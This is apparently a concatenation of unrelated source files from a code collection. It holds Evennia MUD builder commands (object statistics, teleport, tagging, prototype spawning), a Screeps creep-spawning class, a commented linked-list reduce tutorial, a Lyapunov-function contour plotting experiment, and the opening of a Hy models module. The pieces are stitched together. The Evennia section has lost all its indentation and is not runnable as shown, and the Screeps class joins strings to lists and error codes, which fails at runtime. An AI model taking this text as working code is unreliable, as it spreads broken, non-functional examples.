statistics on objects in the database
Usage:
objects [<nr>]
Gives statistics on objects in the database as well as
a list of the <nr> latest objects in the database. If not
given, <nr> defaults to 10.
"""
key = "@objects"
locks = "cmd:perm(listobjects) or perm(Builder)"
help_category = "System"
def func(self):
"""Implement the command"""
caller = self.caller
nlim = int(self.args) if self.args and self.args.isdigit() else 10
nobjs = ObjectDB.objects.count()
Character = class_from_module(settings.BASE_CHARACTER_TYPECLASS)
nchars = Character.objects.all_family().count()
Room = class_from_module(settings.BASE_ROOM_TYPECLASS)
nrooms = Room.objects.all_family().count()
Exit = class_from_module(settings.BASE_EXIT_TYPECLASS)
nexits = Exit.objects.all_family().count()
nother = nobjs - nchars - nrooms - nexits
nobjs = nobjs or 1 # fix zero-div error with empty database
# total object sum table
totaltable = self.styled_table(
"|wtype|n", "|wcomment|n", "|wcount|n", "|w%|n", border="table", align="l"
)
totaltable.align = "l"
totaltable.add_row(
"Characters",
"(BASE_CHARACTER_TYPECLASS + children)",
nchars,
"%.2f" % ((float(nchars) / nobjs) * 100),
)
totaltable.add_row(
"Rooms",
"(BASE_ROOM_TYPECLASS + children)",
nrooms,
"%.2f" % ((float(nrooms) / nobjs) * 100),
)
totaltable.add_row(
"Exits",
"(BASE_EXIT_TYPECLASS + children)",
nexits,
"%.2f" % ((float(nexits) / nobjs) * 100),
)
totaltable.add_row("Other", "", nother, "%.2f" % ((float(nother) / nobjs) * 100))
# typeclass table
typetable = self.styled_table(
"|wtypeclass|n", "|wcount|n", "|w%|n", border="table", align="l"
)
typetable.align = "l"
dbtotals = ObjectDB.objects.get_typeclass_totals()
for stat in dbtotals:
typetable.add_row(
stat.get("typeclass", "<error>"),
stat.get("count", -1),
"%.2f" % stat.get("percent", -1),
)
# last N table
objs = ObjectDB.objects.all().order_by("db_date_created")[max(0, nobjs - nlim): ]
latesttable = self.styled_table(
"|wcreated|n", "|wdbref|n", "|wname|n", "|wtypeclass|n", align="l", border="table"
)
latesttable.align = "l"
for obj in objs:
latesttable.add_row(
utils.datetime_format(obj.date_created), obj.dbref, obj.key, obj.path
)
string = "\n|wObject subtype totals (out of %i Objects):|n\n%s" % (nobjs, totaltable)
string += "\n|wObject typeclass distribution:|n\n%s" % typetable
string += "\n|wLast %s Objects created:|n\n%s" % (min(nobjs, nlim), latesttable)
caller.msg(string)
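# Illustrative sketch, not part of the original module: the per-type percentage
# figures assembled in CmdObjects.func above, computed over plain counts.
def _example_type_percentages(counts):
    """Return {type_name: 'xx.xx'} percentage strings, guarding against an empty db."""
    total = sum(counts.values()) or 1  # same zero-division guard as above
    return {name: "%.2f" % ((float(count) / total) * 100) for name, count in counts.items()}

# _example_type_percentages({"Characters": 2, "Rooms": 5, "Exits": 10, "Other": 3})
# -> {'Characters': '10.00', 'Rooms': '25.00', 'Exits': '50.00', 'Other': '15.00'}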
class CmdTeleport(COMMAND_DEFAULT_CLASS):
"""
teleport object to another location
Usage:
tel/switch [<object> to||=] <target location>
Examples:
tel Limbo
tel/quiet box = Limbo
tel/tonone box
Switches:
quiet - don't echo leave/arrive messages to the source/target
locations for the move.
intoexit - if target is an exit, teleport INTO
the exit object instead of to its destination
tonone - if set, teleport the object to a None-location. If this
switch is set, <target location> is ignored.
Note that the only way to retrieve
an object from a None location is by direct #dbref
reference. A puppeted object cannot be moved to None.
loc - teleport object to the target's location instead of its contents
Teleports an object somewhere. If no object is given, you yourself are
teleported to the target location.
To lock an object from being teleported, set its `teleport` lock, it will be
checked with the caller. To block
a destination from being teleported to, set the destination's `teleport_here`
lock - it will be checked with the thing being teleported. Admins and
higher permissions can always teleport.
"""
key = "@teleport"
aliases = "@tel"
switch_options = ("quiet", "intoexit", "tonone", "loc")
rhs_split = ("=", " to ") # Prefer = delimiter, but allow " to " usage.
locks = "cmd:perm(teleport) or perm(Builder)"
help_category = "Building"
def parse(self):
"""
Breaking out searching here to make this easier to override.
"""
super().parse()
self.obj_to_teleport = self.caller
self.destination = None
if self.rhs:
self.obj_to_teleport = self.caller.search(self.lhs, global_search=True)
if not self.obj_to_teleport:
self.caller.msg("Did not find object to teleport.")
raise InterruptCommand
self.destination = self.caller.search(self.rhs, global_search=True)
elif self.lhs:
self.destination = self.caller.search(self.lhs, global_search=True)
def func(self):
"""Performs the teleport"""
caller = self.caller
obj_to_teleport = self.obj_to_teleport
destination = self.destination
if "tonone" in self.switches:
# teleporting to None
if destination:
# in this case lhs is always the object to teleport
obj_to_teleport = destination
if obj_to_teleport.has_account:
caller.msg(
"Cannot teleport a puppeted object "
"(%s, puppeted by %s) to a None-location."
% (obj_to_teleport.key, obj_to_teleport.account)
)
return
caller.msg("Teleported %s -> None-location." % obj_to_teleport)
if obj_to_teleport.location and "quiet" not in self.switches:
obj_to_teleport.location.msg_contents(
"%s teleported %s into nothingness." % (caller, obj_to_teleport), exclude=caller
)
obj_to_teleport.location = None
return
if not self.args:
caller.msg("Usage: teleport[/switches] [<obj> =] <target or (X,Y,Z)>||home")
return
if not destination:
caller.msg("Destination not found.")
return
if "loc" in self.switches:
destination = destination.location
if not destination:
caller.msg("Destination has no location.")
return
if obj_to_teleport == destination:
caller.msg("You can't teleport an object inside of itself!")
return
if obj_to_teleport == destination.location:
caller.msg("You can't teleport an object inside something it holds!")
return
if obj_to_teleport.location and obj_to_teleport.location == destination:
caller.msg("%s is already at %s." % (obj_to_teleport, destination))
return
# check any locks
if not (caller.permissions.check("Admin") or obj_to_teleport.access(caller, "teleport")):
caller.msg(f"{obj_to_teleport} 'teleport'-lock blocks you from teleporting "
"it anywhere.")
return
if not (caller.permissions.check("Admin")
or destination.access(obj_to_teleport, "teleport_here")):
caller.msg(f"{destination} 'teleport_here'-lock blocks {obj_to_teleport} from "
"moving there.")
return
# try the teleport
if not obj_to_teleport.location:
# teleporting from none-location
obj_to_teleport.location = destination
caller.msg(f"Teleported {obj_to_teleport} None -> {destination}")
elif obj_to_teleport.move_to(
destination, quiet="quiet" in self.switches,
emit_to_obj=caller, use_destination="intoexit" not in self.switches):
if obj_to_teleport == caller:
caller.msg(f"Teleported to {destination}.")
else:
caller.msg(f"Teleported {obj_to_teleport} -> {destination}.")
else:
caller.msg("Teleportation failed.")
class CmdTag(COMMAND_DEFAULT_CLASS):
"""
handles the tags of an object
Usage:
tag[/del] <obj> [= <tag>[:<category>]]
tag/search <tag>[:<category]
Switches:
search - return all objects with a given Tag
del - remove the given tag. If no tag is specified,
clear all tags on object.
Manipulates and lists tags on objects. Tags allow for quick
grouping of and searching for objects. If only <obj> is given,
list all tags on the object. If /search is used, list objects
with the given tag.
The category can be used for grouping tags themselves, but it
should be used with restraint - tags on their own are usually
enough for most grouping schemes.
"""
key = "@tag"
aliases = ["@tags"]
options = ("search", "del")
locks = "cmd:perm(tag) or perm(Builder)"
help_category = "Building"
arg_regex = r"(/\w+?(\s|$))|\s|$"
def func(self):
"""Implement the tag functionality"""
if not self.args:
self.caller.msg("Usage: tag[/switches] <obj> [= <tag>[:<category>]]")
return
if "search" in self.switches:
# search by tag
tag = self.args
category = None
if ":" in tag:
tag, category = [part.strip() for part in tag.split(":", 1)]
objs = search.search_tag(tag, category=category)
nobjs = len(objs)
if nobjs > 0:
catstr = (
" (category: '|w%s|n')" % category
if category
else ("" if nobjs == 1 else " (may have different tag categories)")
)
matchstr = ", ".join(o.get_display_name(self.caller) for o in objs)
string = "Found |w%i|n object%s with tag '|w%s|n'%s:\n %s" % (
nobjs,
"s" if nobjs > 1 else "",
tag,
catstr,
matchstr,
)
else:
string = "No objects found with tag '%s%s'." % (
tag,
" (category: %s)" % category if category else "",
)
self.caller.msg(string)
return
if "del" in self.switches:
# remove one or all tags
obj = self.caller.search(self.lhs, global_search=True)
if not obj:
return
if self.rhs:
# remove individual tag
tag = self.rhs
category = None
if ":" in tag:
tag, category = [part.strip() for part in tag.split(":", 1)]
if obj.tags.get(tag, category=category):
obj.tags.remove(tag, category=category)
string = "Removed tag '%s'%s from %s." % (
tag,
" (category: %s)" % category if category else "",
obj,
)
else:
string = "No tag '%s'%s to delete on %s." % (
tag,
" (category: %s)" % category if category else "",
obj,
)
else:
# no tag specified, clear all tags
old_tags = [
"%s%s" % (tag, " (category: %s)" % category if category else "")
for tag, category in obj.tags.all(return_key_and_category=True)
]
if old_tags:
obj.tags.clear()
string = "Cleared all tags from %s: %s" % (obj, ", ".join(sorted(old_tags)))
else:
string = "No Tags to clear on %s." % obj
self.caller.msg(string)
return
# no search/deletion
if self.rhs:
# = is found; command args are of the form obj = tag
obj = self.caller.search(self.lhs, global_search=True)
if not obj:
return
tag = self.rhs
category = None
if ":" in tag:
tag, category = [part.strip() for part in tag.split(":", 1)]
# create the tag
obj.tags.add(tag, category=category)
string = "Added tag '%s'%s to %s." % (
tag,
" (category: %s)" % category if category else "",
obj,
)
self.caller.msg(string)
else:
# no = found - list tags on object
obj = self.caller.search(self.args, global_search=True)
if not obj:
return
tagtuples = obj.tags.all(return_key_and_category=True)
ntags = len(tagtuples)
tags = [tup[0] for tup in tagtuples]
categories = [" (category: %s)" % tup[1] if tup[1] else "" for tup in tagtuples]
if ntags:
string = "Tag%s on %s: %s" % (
"s" if ntags > 1 else "",
obj,
", ".join(sorted("'%s'%s" % (tags[i], categories[i]) for i in range(ntags))),
)
else:
string = "No tags attached to %s." % obj
self.caller.msg(string)
# helper functions for spawn
class CmdSpawn(COMMAND_DEFAULT_CLASS):
"""
spawn objects from prototype
Usage:
spawn[/noloc] <prototype_key>
spawn[/noloc] <prototype_dict>
      spawn/search [prototype_key][;tag[,tag]]
spawn/list [tag, tag, ...]
spawn/list modules - list only module-based prototypes
spawn/show [<prototype_key>]
spawn/update <prototype_key>
spawn/save <prototype_dict>
spawn/edit [<prototype_key>]
olc - equivalent to spawn/edit
Switches:
noloc - allow location to be None if not specified explicitly. Otherwise,
location will default to caller's current location.
search - search prototype by name or tags.
list - list available prototypes, optionally limit by tags.
show, examine - inspect prototype by key. If not given, acts like list.
raw - show the raw dict of the prototype as a one-line string for manual editing.
save - save a prototype to the database. It will be listable by /list.
delete - remove a prototype from database, if allowed to.
update - find existing objects with the same prototype_key and update
them with latest version of given prototype. If given with /save,
will auto-update all objects with the old version of the prototype
without asking first.
edit, menu, olc - create/manipulate prototype in a menu interface.
Example:
spawn GOBLIN
spawn {"key":"goblin", "typeclass":"monster.Monster", "location":"#2"}
spawn/save {"key": "grunt", prototype: "goblin"};;mobs;edit:all()
\f
Dictionary keys:
|wprototype_parent |n - name of parent prototype to use. Required if typeclass is
not set. Can be a path or a list for multiple inheritance (inherits
left to right). If set one of the parents must have a typeclass.
|wtypeclass |n - string. Required if prototype_parent is not set.
|wkey |n - string, the main object identifier
|wlocation |n - this should be a valid object or #dbref
|whome |n - valid object or #dbref
|wdestination|n - only valid for exits (object or dbref)
|wpermissions|n - string or list of permission strings
|wlocks |n - a lock-string
|waliases |n - string or list of strings.
|wndb_|n<name> - value of a nattribute (ndb_ is stripped)
|wprototype_key|n - name of this prototype. Unique. Used to store/retrieve from db
and update existing prototyped objects if desired.
|wprototype_desc|n - desc of this prototype. Used in listings
|wprototype_locks|n - locks of this prototype. Limits who may use prototype
|wprototype_tags|n - tags of this prototype. Used to find prototype
any other keywords are interpreted as Attributes and their values.
The available prototypes are defined globally in modules set in
settings.PROTOTYPE_MODULES. If spawn is used without arguments it
displays a list of available prototypes.
"""
key = "@spawn"
aliases = ["@olc"]
switch_options = (
"noloc",
"search",
"list",
"show",
"raw",
"examine",
"save",
"delete",
"menu",
"olc",
"update",
"edit",
)
locks = "cmd:perm(spawn) or perm(Builder)"
help_category = "Building"
def _search_prototype(self, prototype_key, quiet=False):
"""
Search for prototype and handle no/multi-match and access.
        Returns a single found prototype or None. In the None case, the
        caller has already been informed of the search error and we need
        not take any further action.
"""
prototypes = protlib.search_prototype(prototype_key)
nprots = len(prototypes)
# handle the search result
err = None
if not prototypes:
err = f"No prototype named '{prototype_key}' was found."
elif nprots > 1:
err = "Found {} prototypes matching '{}':\n {}".format(
nprots,
prototype_key,
", ".join(proto.get("prototype_key", "") for proto in prototypes),
)
else:
# we have a single prototype, check access
prototype = prototypes[0]
if not self.caller.locks.check_lockstring(
self.caller, prototype.get("prototype_locks", ""), access_type="spawn", default=True
):
err = "You don't have access to use this prototype."
if err:
# return None on any error
if not quiet:
self.caller.msg(err)
return
return prototype
def _parse_prototype(self, inp, expect=dict):
"""
Parse a prototype dict or key from the input and convert it safely
into a dict if appropriate.
Args:
inp (str): The input from user.
            expect (type, optional): The type the parsed input is expected to be (usually dict or str).
Returns:
prototype (dict, str or None): The parsed prototype. If None, the error
was already reported.
"""
eval_err = None
try:
prototype = _LITERAL_EVAL(inp)
except (SyntaxError, ValueError) as err:
# treat as string
eval_err = err
prototype = utils.to_str(inp)
finally:
# it's possible that the input was a prototype-key, in which case
# it's okay for the LITERAL_EVAL to fail. Only if the result does not
# match the expected type do we have a problem.
if not isinstance(prototype, expect):
if eval_err:
string = (
f"{inp}\n{eval_err}\n|RCritical Python syntax error in argument. Only primitive "
"Python structures are allowed. \nMake sure to use correct "
"Python syntax. Remember especially to put quotes around all "
"strings inside lists and dicts.|n For more advanced uses, embed "
"funcparser callables ($funcs) in the strings."
)
else:
string = "Expected {}, got {}.".format(expect, type(prototype))
self.caller.msg(string)
return
if expect == dict:
# an actual prototype. We need to make sure it's safe,
# so don't allow exec.
# TODO: Exec support is deprecated. Remove completely for 1.0.
if "exec" in prototype and not self.caller.check_permstring("Developer"):
self.caller.msg(
"Spawn aborted: You are not allowed to " "use the 'exec' prototype key."
)
return
try:
                    # we homogenize the prototype first, to be more lenient with free-form input
protlib.validate_prototype(protlib.homogenize_prototype(prototype))
except RuntimeError as err:
self.caller.msg(str(err))
return
return prototype
def _get_prototype_detail(self, query=None, prototypes=None):
"""
Display the detailed specs of one or more prototypes.
Args:
query (str, optional): If this is given and `prototypes` is not, search for
the prototype(s) by this query. This may be a partial query which
may lead to multiple matches, all being displayed.
prototypes (list, optional): If given, ignore `query` and only show these
prototype-details.
Returns:
display (str, None): A formatted string of one or more prototype details.
If None, the caller was already informed of the error.
"""
if not prototypes:
# we need to query. Note that if query is None, all prototypes will
# be returned.
prototypes = protlib.search_prototype(key=query)
if prototypes:
return "\n".join(protlib.prototype_to_str(prot) for prot in prototypes)
elif query:
self.caller.msg(f"No prototype named '{query}' was found.")
else:
self.caller.msg("No prototypes found.")
def _list_prototypes(self, key=None, tags=None):
"""Display prototypes as a list, optionally limited by key/tags. """
protlib.list_prototypes(self.caller, key=key, tags=tags, session=self.session)
@interactive
def _update_existing_objects(self, caller, prototype_key, quiet=False):
"""
Update existing objects (if any) with this prototype-key to the latest
prototype version.
Args:
caller (Object): This is necessary for @interactive to work.
prototype_key (str): The prototype to update.
quiet (bool, optional): If set, don't report to user if no
old objects were found to update.
Returns:
n_updated (int): Number of updated objects.
"""
prototype = self._search_prototype(prototype_key)
if not prototype:
return
existing_objects = protlib.search_objects_with_prototype(prototype_key)
if not existing_objects:
if not quiet:
caller.msg("No existing objects found with an older version of this prototype.")
return
if existing_objects:
n_existing = len(existing_objects)
slow = " (note that this may be slow)" if n_existing > 10 else ""
string = (
f"There are {n_existing} existing object(s) with an older version "
f"of prototype '{prototype_key}'. Should it be re-applied to them{slow}? [Y]/N"
)
answer = yield (string)
if answer.lower() in ["n", "no"]:
caller.msg(
"|rNo update was done of existing objects. "
"Use spawn/update <key> to apply later as needed.|n"
)
return
try:
n_updated = spawner.batch_update_objects_with_prototype(
prototype, objects=existing_objects, caller=caller,
)
            except Exception:
                logger.log_trace()
                caller.msg("|rUpdate failed - see the server log for details.|n")
                return
            caller.msg(f"{n_updated} objects were updated.")
return
def _parse_key_desc_tags(self, argstring, desc=True):
"""
Parse ;-separated input list.
"""
        key, desc_text, tags = "", "", []
        if ";" in argstring:
            parts = [part.strip().lower() for part in argstring.split(";")]
            if len(parts) > 1 and desc:
                key = parts[0]
                desc_text = parts[1]
                tags = parts[2:]
            else:
                key = parts[0]
                tags = parts[1:]
        else:
            key = argstring.strip().lower()
        return key, desc_text, tags
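    # Illustrative behavior of the parser above (comment added for clarity):
    # "grunt;a small goblin;mobs;cave" returns
    # ("grunt", "a small goblin", ["mobs", "cave"]), while a bare "grunt"
    # returns ("grunt", "", []).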
def func(self):
"""Implements the spawner"""
caller = self.caller
noloc = "noloc" in self.switches
# run the menu/olc
if (
self.cmdstring == "olc"
or "menu" in self.switches
or "olc" in self.switches
or "edit" in self.switches
):
# OLC menu mode
prototype = None
if self.lhs:
prototype_key = self.lhs
prototype = self._search_prototype(prototype_key)
if not prototype:
return
olc_menus.start_olc(caller, session=self.session, prototype=prototype)
return
if "search" in self.switches:
# query for a key match. The arg is a search query or nothing.
if not self.args:
# an empty search returns the full list
self._list_prototypes()
return
# search for key;tag combinations
key, _, tags = self._parse_key_desc_tags(self.args, desc=False)
self._list_prototypes(key, tags)
return
if "raw" in self.switches:
# query for key match and return the prototype as a safe one-liner string.
            if not self.args:
                caller.msg("You need to specify a prototype-key to get the raw data for.")
                return
            prototype = self._search_prototype(self.args)
if not prototype:
return
caller.msg(str(prototype))
return
if "show" in self.switches or "examine" in self.switches:
# show a specific prot detail. The argument is a search query or empty.
if not self.args:
# we don't show the list of all details, that's too spammy.
caller.msg("You need to specify a prototype-key to show.")
return
detail_string = self._get_prototype_detail(self.args)
if not detail_string:
return
caller.msg(detail_string)
return
if "list" in self.switches:
# for list, all optional arguments are tags.
tags = self.lhslist
err = self._list_prototypes(tags=tags)
if err:
caller.msg(
"No prototypes found with prototype-tag(s): {}".format(
list_to_string(tags, "or")
)
)
return
if "save" in self.switches:
# store a prototype to the database store
if not self.args:
caller.msg(
"Usage: spawn/save [<key>[;desc[;tag,tag[,...][;lockstring]]]] = <prototype_dict>"
)
return
if self.rhs:
# input on the form key = prototype
prototype_key, prototype_desc, prototype_tags = self._parse_key_desc_tags(self.lhs)
prototype_key = None if not prototype_key else prototype_key
prototype_desc = None if not prototype_desc else prototype_desc
prototype_tags = None if not prototype_tags else prototype_tags
prototype_input = self.rhs.strip()
else:
prototype_key = prototype_desc = None
prototype_tags = None
prototype_input = self.lhs.strip()
# handle parsing
prototype = self._parse_prototype(prototype_input)
if not prototype:
return
prot_prototype_key = prototype.get("prototype_key")
if not (prototype_key or prot_prototype_key):
caller.msg(
"A prototype_key must be given, either as `prototype_key = <prototype>` "
"or as a key 'prototype_key' inside the prototype structure."
)
return
if prototype_key is None:
prototype_key = prot_prototype_key
if prot_prototype_key != prototype_key:
caller.msg("(Replacing `prototype_key` in prototype with given key.)")
prototype["prototype_key"] = prototype_key
            if prototype_desc is not None and prototype.get("prototype_desc") != prototype_desc:
caller.msg("(Replacing `prototype_desc` in prototype with given desc.)")
prototype["prototype_desc"] = prototype_desc
if prototype_tags is not None and prototype.get("prototype_tags") != prototype_tags:
caller.msg("(Replacing `prototype_tags` in prototype with given tag(s))")
prototype["prototype_tags"] = prototype_tags
string = ""
# check for existing prototype (exact match)
old_prototype = self._search_prototype(prototype_key, quiet=True)
diff = spawner.prototype_diff(old_prototype, prototype, homogenize=True)
diffstr = spawner.format_diff(diff)
new_prototype_detail = self._get_prototype_detail(prototypes=[prototype])
if old_prototype:
if not diffstr:
string = f"|yAlready existing Prototype:|n\n{new_prototype_detail}\n"
question = (
"\nThere seems to be no changes. Do you still want to (re)save? [Y]/N"
)
else:
string = (
f'|yExisting prototype "{prototype_key}" found. Change:|n\n{diffstr}\n'
f"|yNew changed prototype:|n\n{new_prototype_detail}"
)
question = (
"\n|yDo you want to apply the change to the existing prototype?|n [Y]/N"
)
else:
string = f"|yCreating new prototype:|n\n{new_prototype_detail}"
question = "\nDo you want to continue saving? [Y]/N"
answer = yield (string + question)
if answer.lower() in ["n", "no"]:
caller.msg("|rSave cancelled.|n")
return
# all seems ok. Try to save.
try:
prot = protlib.save_prototype(prototype)
if not prot:
caller.msg("|rError saving:|R {}.|n".format(prototype_key))
return
except protlib.PermissionError as err:
caller.msg("|rError saving:|R {}|n".format(err))
return
caller.msg("|gSaved prototype:|n {}".format(prototype_key))
# check if we want to update existing objects
self._update_existing_objects(self.caller, prototype_key, quiet=True)
return
if not self.args:
# all switches beyond this point gets a common non-arg return
ncount = len(protlib.search_prototype())
caller.msg(
"Usage: spawn <prototype-key> or {{key: value, ...}}"
f"\n ({ncount} existing prototypes. Use /list to inspect)"
)
return
if "delete" in self.switches:
# remove db-based prototype
prototype_detail = self._get_prototype_detail(self.args)
if not prototype_detail:
return
string = f"|rDeleting prototype:|n\n{prototype_detail}"
question = "\nDo you want to continue deleting? [Y]/N"
answer = yield (string + question)
if answer.lower() in ["n", "no"]:
caller.msg("|rDeletion cancelled.|n")
return
try:
success = protlib.delete_prototype(self.args)
except protlib.PermissionError as err:
retmsg = f"|rError deleting:|R {err}|n"
else:
retmsg = (
"Deletion successful"
if success
else "Deletion failed (does the prototype exist?)"
)
caller.msg(retmsg)
return
if "update" in self.switches:
# update existing prototypes
prototype_key = self.args.strip().lower()
self._update_existing_objects(self.caller, prototype_key)
return
# If we get to this point, we use not switches but are trying a
# direct creation of an object from a given prototype or -key
prototype = self._parse_prototype(
self.args, expect=dict if self.args.strip().startswith("{") else str
)
if not prototype:
# this will only let through dicts or strings
return
key = "<unnamed>"
if isinstance(prototype, str):
# A prototype key we are looking to apply
prototype_key = prototype
prototype = self._search_prototype(prototype_key)
if not prototype:
return
# proceed to spawning
try:
for obj in spawner.spawn(prototype, caller=self.caller):
self.caller.msg("Spawned %s." % obj.get_display_name(self.caller))
if not prototype.get("location") and not noloc:
# we don't hardcode the location in the prototype (unless the user
# did so manually) - that would lead to it having to be 'removed' every
# time we try to update objects with this prototype in the future.
obj.location = caller.location
except RuntimeError as err:
caller.msg(err)
|
the-stack_0_1589 | class _Creep:
body = []
memory = {'class' : 'AbstractBaseCreep'} # Override this in subclasses
name = None
def __init__(self, spawner):
self.spawner = spawner
def spawn(self):
resp = self.spawner.canCreateCreep(self.body, self.name)
if resp == OK:
print("Spawning new " + self.type)
print("Body: " + self.body)
print("Memory: " + self.memory)
self.spawner.createCreep(self.body, self.name, self.memory)
else:
print("Tried to spawn a " + self.type + " but got code " + resp)
class BasicHarvester(_Creep):
body = [WORK, MOVE, CARRY]
memory = {'class': 'BasicHarvester'}
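# Illustrative extension sketch (assumptions for demonstration: WORK, MOVE,
# CARRY, OK and Game are globals injected by the Screeps runtime when this
# module is built with Transcrypt, which the code above already assumes):
#
#     class HeavyHarvester(_Creep):
#         body = [WORK, WORK, MOVE, CARRY]
#         memory = {'class': 'HeavyHarvester'}
#
#     def spawn_all(spawner):
#         BasicHarvester(spawner).spawn()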
|
the-stack_0_1590 | # https://gist.github.com/seanchen1991/a151368df32b8e7ae6e7fde715e44b78
# reduce takes a data structure and either finds a key piece of data or
# be able to restructure the data structure
# 1. Reduce usually takes a linear data structure (99% we use reduce on an array)
# 2. Reduce "aggregates" all of the data in the data structure into one final value
# 3. Reduce is extremely flexible with how the reduction actually happens
# 3a. Reduce doesn't care how the reduction happens
# 4. The "reducer" function that's passed in as input is how we specify how the reduction happens
# what's the deal with the anonymous function's parameters?
# 1. An aggregator value
# 2. The current list node
# 3. An optional value the aggregator is initialized with
# what happens on a single call of the anonymous function?
# how many times does the reducer function get called? Once for every element in our data structure
# does the anonymous function do the work of iterating over our data structure?
# no, the anonymous function itself doesn't do the work of iterating
# Steps for our reduce function
# How do all of these calls get aggregated into a single value?
# The anonymous function needs to update the aggregated value somehow
# where is the state set and how is it defaulted to the head?
def linked_list_reduce(head, reducer, init=None):
# where/when do we initialize the state?
# initialize state before we start looping
state = None
# what do we do when the init value is set?
    if init is not None:
        state = init
    # what do we do when the init value is None?
    else:
# set the state to be the first value in our list
state = head.value
# move the head to the next list node
head = head.next
# 1. Loop over the data structure
current = head
while current:
# 2. Call our anonymous function on the current iteration value
# 3. Update our state to be the result of the anonymous function
state = reducer(state, current.value)
# update our current pointer
current = current.next
# 4. Return the final aggregated state
return state
class Node:
def __init__(self, value, next=None):
self.value = value
self.next = next
l1 = Node(4)
l2 = Node(7)
l3 = Node(15)
l4 = Node(29)
l5 = Node(5)
l1.next = l2
l2.next = l3
l3.next = l4
l4.next = l5
def reducer(x, y): return x - y
print(linked_list_reduce(l1, reducer, 100))
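# A further illustrative example (an addition, not part of the original gist):
# the same reduce machinery works with any reducer. Summing the list
# 4 -> 7 -> 15 -> 29 -> 5 with no init value starts the state at the head node.
print(linked_list_reduce(l1, lambda acc, value: acc + value))  # prints 60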
|
the-stack_0_1591 | """Plot a Lyapunov contour"""
from typing import cast, List, Tuple, Optional, TYPE_CHECKING
import matplotlib.pyplot as plt
from matplotlib.pyplot import figure
import pandas as pd
import seaborn as sns
import torch
import tqdm
from neural_clbf.experiments import Experiment
from neural_clbf.systems import ObservableSystem # noqa
if TYPE_CHECKING:
from neural_clbf.controllers import Controller, NeuralObsBFController # noqa
class LFContourExperiment(Experiment):
"""An experiment for plotting the contours of learned LFs"""
def __init__(
self,
name: str,
domain: Optional[List[Tuple[float, float]]] = None,
n_grid: int = 50,
x_axis_index: int = 0,
y_axis_index: int = 1,
x_axis_label: str = "$x$",
y_axis_label: str = "$y$",
default_state: Optional[torch.Tensor] = None,
):
"""Initialize an experiment for plotting the value of the LF over selected
state dimensions.
args:
name: the name of this experiment
domain: a list of two tuples specifying the plotting range,
one for each state dimension.
n_grid: the number of points in each direction at which to compute h
x_axis_index: the index of the state variable to plot on the x axis
y_axis_index: the index of the state variable to plot on the y axis
x_axis_label: the label for the x axis
y_axis_label: the label for the y axis
default_state: 1 x dynamics_model.n_dims tensor of default state
values. The values at x_axis_index and y_axis_index will be
overwritten by the grid values.
"""
super(LFContourExperiment, self).__init__(name)
# Default to plotting over [-1, 1] in all directions
if domain is None:
domain = [(-1.0, 1.0), (-1.0, 1.0)]
self.domain = domain
self.n_grid = n_grid
self.x_axis_index = x_axis_index
self.y_axis_index = y_axis_index
self.x_axis_label = x_axis_label
self.y_axis_label = y_axis_label
self.default_state = default_state
@torch.no_grad()
def run(self, controller_under_test: "Controller") -> pd.DataFrame:
"""
Run the experiment, likely by evaluating the controller, but the experiment
has freedom to call other functions of the controller as necessary (if these
functions are not supported by all controllers, then experiments will be
responsible for checking compatibility with the provided controller)
args:
controller_under_test: the controller with which to run the experiment
returns:
a pandas DataFrame containing the results of the experiment, in tidy data
format (i.e. each row should correspond to a single observation from the
experiment).
"""
# Sanity check: can only be called on a NeuralObsBFController
if not (hasattr(controller_under_test, "h")):
raise ValueError("Controller under test must be a NeuralObsBFController")
controller_under_test = cast("NeuralObsBFController", controller_under_test)
# Set up a dataframe to store the results
results_df = pd.DataFrame()
# Set up the plotting grid
device = "cpu"
if hasattr(controller_under_test, "device"):
device = controller_under_test.device # type: ignore
x_vals = torch.linspace(
self.domain[0][0], self.domain[0][1], self.n_grid, device=device
)
y_vals = torch.linspace(
self.domain[1][0], self.domain[1][1], self.n_grid, device=device
)
# Default to all zeros if no default provided
if self.default_state is None:
default_state = torch.zeros(1, controller_under_test.dynamics_model.n_dims)
else:
default_state = self.default_state
default_state = default_state.type_as(x_vals)
# Make a copy of the default state, which we'll modify on every loop
x = (
default_state.clone()
.detach()
.reshape(1, controller_under_test.dynamics_model.n_dims)
)
# Loop through the grid
prog_bar_range = tqdm.trange(self.n_grid, desc="Plotting LF", leave=True)
for i in prog_bar_range:
for j in range(self.n_grid):
# Adjust x to be at the current grid point
x[0, self.x_axis_index] = x_vals[i]
x[0, self.y_axis_index] = y_vals[j]
# Get the value of the LF at this point
V = controller_under_test.V(x)
# TODO @dawsonc measure violation
# Store the results
results_df = results_df.append(
{
self.x_axis_label: x_vals[i].cpu().numpy().item(),
self.y_axis_label: y_vals[j].cpu().numpy().item(),
"V": V.cpu().numpy().item(),
},
ignore_index=True,
)
return results_df
def plot(
self,
controller_under_test: "Controller",
results_df: pd.DataFrame,
display_plots: bool = False,
) -> List[Tuple[str, figure]]:
"""
Plot the results, and return the plot handles. Optionally
display the plots.
args:
controller_under_test: the controller with which to run the experiment
display_plots: defaults to False. If True, display the plots (blocks until
the user responds).
returns: a list of tuples containing the name of each figure and the figure
object.
"""
# Set the color scheme
sns.set_theme(context="talk", style="white")
# Plot a contour of h
fig, ax = plt.subplots(1, 1)
fig.set_size_inches(12, 8)
contours = ax.tricontourf(
results_df[self.x_axis_label],
results_df[self.y_axis_label],
results_df["V"],
cmap=sns.color_palette("rocket", as_cmap=True),
)
plt.colorbar(contours, ax=ax, orientation="vertical")
# Make the legend
ax.set_xlabel(self.x_axis_label)
ax.set_ylabel(self.y_axis_label)
fig_handle = ("V Contour", fig)
if display_plots:
plt.show()
return []
else:
return [fig_handle]
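# Illustrative usage sketch (an assumption for demonstration; `controller` must
# be a neural_clbf controller exposing `h`/`V`, which is not constructed here):
#
#     experiment = LFContourExperiment(
#         "V_contour",
#         domain=[(-2.0, 2.0), (-2.0, 2.0)],
#         n_grid=30,
#         x_axis_label="$x$",
#         y_axis_label="$\\theta$",
#     )
#     df = experiment.run(controller)
#     experiment.plot(controller, df, display_plots=True)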
|
the-stack_0_1592 | # Copyright 2021 the authors.
# This file is part of Hy, which is free software licensed under the Expat
# license. See the LICENSE.
from __future__ import unicode_literals
from contextlib import contextmanager
from math import isnan, isinf
from hy import _initialize_env_var
from hy.errors import HyWrapperError
from fractions import Fraction
from colorama import Fore
PRETTY = True
COLORED = _initialize_env_var('HY_COLORED_AST_OBJECTS', False)
@contextmanager
def pretty(pretty=True):
"""
Context manager to temporarily enable
or disable pretty-printing of Hy model reprs.
"""
global PRETTY
old, PRETTY = PRETTY, pretty
try:
yield
finally:
PRETTY = old
class _ColoredModel:
"""
Mixin that provides a helper function for models that have color.
"""
def _colored(self, text):
